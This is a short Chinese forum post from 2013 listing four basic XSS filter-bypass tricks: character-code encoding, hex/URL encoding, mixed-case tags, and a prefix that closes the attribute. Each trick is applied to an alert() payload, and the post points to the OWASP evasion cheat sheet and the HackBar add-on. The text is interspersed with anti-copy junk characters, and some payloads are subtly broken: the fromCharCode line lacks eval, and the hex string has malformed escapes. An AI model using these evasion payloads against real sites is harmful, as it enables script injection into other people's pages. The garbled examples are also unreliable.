四种超级基础的绕过方法。
2 A5 K1 k$ I+ Y# J7 s6 M1.转换为ASCII码
/ m# `0 ~; q2 l& L例子:原脚本为<script>alert(‘I love F4ck’)</script >& @1 h& o0 m, u1 l" o
通过转换,变成:0 ^, Z8 t( n2 X0 T, m
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>: V1 P) I& B. a9 ?$ x1 Q
- Z v4 s: m; m% L' P
2.转换为HEX(十六进制)
* A" x, n! M s2 i5 C/ M4 u例子:原脚本为<script>alert(‘I love F4ck’)</script>
, f& M; G* u, p% }, g4 [通过转换,变成:
0 c7 X# L( q) Y3 o- Z%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
9 I/ z# ^# T' d9 i w ! b8 R1 v% t8 y E8 c$ i4 m/ J& S
3.转换脚本的大小写
& V6 K# x. j! ~0 G# z例子:原脚本为<script>alert(‘I love F4ck’)</script>
3 O' r6 c' H9 |转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
% M+ M3 l* U6 u5 B5 ^6 k
' M4 e* V) m: ?! \' q4.增加闭合标记”>
; @4 b6 h$ ~8 t5 \, F+ V& i q4 c例子:原脚本为<script>alert(‘I love F4ck’)</script>) H' b3 c* j4 q" z. G5 b8 t
转换为:”><script>alert(‘I love F4ck’)</script>
) A4 T7 y; [% G; n1 d& L6 `9 m更详细绕过技术请参考此网页
! N) H+ v4 @7 jhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet% p! ~$ q2 }& F! X% X X2 U0 B; N* p
4 m" Y0 {9 y# |& t6 L V _9 V转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对